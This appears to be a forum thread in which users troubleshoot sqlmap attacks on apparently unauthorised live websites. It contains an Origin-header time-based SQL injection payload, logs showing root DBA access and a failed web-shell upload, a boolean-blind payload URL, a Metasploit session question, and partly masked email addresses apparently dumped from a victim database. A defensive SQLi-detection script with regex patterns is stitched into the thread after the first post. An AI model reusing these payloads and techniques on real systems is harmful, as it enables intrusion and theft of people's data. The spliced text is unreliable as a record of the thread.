Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. Duble (New Member, joined 28 Oct 2015)

    Vulnerability in a header
    Code:
    Origin: -1;select pg_sleep(0); -- 
    How do I feed this into sqlmap correctly?
    --headers="Origin:*" doesn't work

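As an added example (not code from the thread or from sqlmap): the payload in the first post sits in the Origin header, an input that many applications copy into queries or logs without the validation that URL parameters get. The script below scans the headers of a parsed request against a small signature list so a log-review job or WAF rule can flag header-borne probes the same way it flags parameter probes; the requests, header names and regexes are constructed for this example and are illustrative, not a complete ruleset.

```python
"""Flag SQL-injection probes carried in HTTP request headers (constructed example)."""
import re

# (technique, compiled pattern); deliberately small, extend per DBMS in use.
SIGNATURES = [
    ("time-based (PostgreSQL pg_sleep)", re.compile(r"pg_sleep\s*\(", re.I)),
    ("time-based (MySQL SLEEP/BENCHMARK)", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("time-based (MSSQL WAITFOR)", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("stacked query", re.compile(r";\s*(select|insert|update|delete|drop|exec)\b", re.I)),
    ("comment terminator", re.compile(r"(--|#|/\*)\s*$")),
    ("boolean tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+\b", re.I)),
]


def scan_headers(headers):
    """Return [(header_name, technique)] for every signature that matches a header value.

    Every header is checked, not just the usual injection points, because the
    thread shows an application consuming Origin as query input.
    """
    hits = []
    for name, value in headers.items():
        for technique, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((name, technique))
    return hits


# Constructed requests: the Origin payload quoted in the first post, and a benign one.
PROBE = {
    "Host": "app.example.test",
    "Origin": "-1;select pg_sleep(0); -- ",
    "User-Agent": "Mozilla/5.0",
}
BENIGN = {
    "Host": "app.example.test",
    "Origin": "https://app.example.test",
    "User-Agent": "Mozilla/5.0",
}

if __name__ == "__main__":
    for label, request in (("probe", PROBE), ("benign", BENIGN)):
        print(label, scan_headers(request) or "clean")
```

The same patterns applied to a query string would also catch the `AND 2864=2864` boolean probe shown later in this thread.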
  2. Axiles (New Member, joined 14 Jan 2016)

    Can someone tell me why it dumps in this format?
    ***te89@gmail.co.uk
    ***slav.stojanov@outlook.com
    ***eneellis73@gmail.com
    ***chan@yahoo.com
    What causes this?

  3. matvejcik (New Member, joined 22 Nov 2012)

    You need to put in the original parameter. You're passing either an empty one or an already-exploited parameter, and in general you should check by hand whether there's a hole there at all.

  4. 2fed (Member, joined 26 Mar 2008)

    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)


    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)


    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)



    [04:43:21] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:43:21] [INFO] testing if current user is DBA
    [04:43:21] [INFO] fetching current user
    [04:43:22] [INFO] retrieved: 'root@localhost'
    current user is DBA: True

    Can't upload a shell
    [04:44:04] [WARNING] unable to upload the file stager on '/var/www/'
    [04:44:04] [INFO] trying to upload the file stager on '/var/www/menu/-1/' via LIMIT 'LINES TERMINATED BY' method

    Nothing works.
    [04:45:04] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.0
    [04:45:04] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell>
    [04:00:51] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

    Please tell me what can be done???

  5. Duble (New Member, joined 28 Oct 2015)

    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://site.com:80/Help/HelpIndex.html?HelpName=Earn money&ThemeID=17 AND 2864=2864
    ---
    [16:58:45] [INFO] testing MySQL
    [16:58:45] [WARNING] the back-end DBMS is not MySQL
    [16:58:45] [INFO] testing Oracle
    [16:58:45] [WARNING] the back-end DBMS is not Oracle
    [16:58:45] [INFO] testing PostgreSQL
    [16:58:45] [WARNING] the back-end DBMS is not PostgreSQL
    [16:58:45] [INFO] testing Microsoft SQL Server
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft SQL Server
    [16:58:45] [INFO] testing SQLite
    [16:58:45] [WARNING] the back-end DBMS is not SQLite
    [16:58:45] [INFO] testing Microsoft Access
    [16:58:45] [WARNING] the back-end DBMS is not Microsoft Access
    [16:58:45] [INFO] testing Firebird
    [16:58:45] [WARNING] the back-end DBMS is not Firebird
    [16:58:45] [INFO] testing SAP MaxDB
    [16:58:45] [WARNING] the back-end DBMS is not SAP MaxDB
    [16:58:45] [INFO] testing Sybase
    [16:58:45] [WARNING] the back-end DBMS is not Sybase
    [16:58:45] [INFO] testing IBM DB2
    [16:58:45] [WARNING] the back-end DBMS is not IBM DB2
    [16:58:45] [INFO] testing HSQLDB
    [16:58:45] [WARNING] the back-end DBMS is not HSQLDB
    [16:58:45] [INFO] testing H2
    [16:58:45] [WARNING] the back-end DBMS is not H2
    [16:58:45] [INFO] testing Informix
    [16:58:45] [WARNING] the back-end DBMS is not Informix
    [16:58:45] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system

    [*] ending @ 16:58:45 /2020-06-28/
    Has anyone run into this? What's the problem?

  6. dzhim2014 (New Member, joined 18 Oct 2013)

    On a neighbouring board they discussed that one SQLi might not give away the DBMS while another might. Look for more SQLi on the site.
    They also blame the WAF and suggest the vulnerability type is NoSQL, which is why it can't determine the dbms.

  7. dzhim2014 (New Member, joined 18 Oct 2013)

    sqlmap and metasploit interaction: what's wrong?
    It dumps fine but refuses to create the connection; all paths are set correctly...
    A Google search for "unable to prompt for an out-of-band session" turned up nothing sensible..
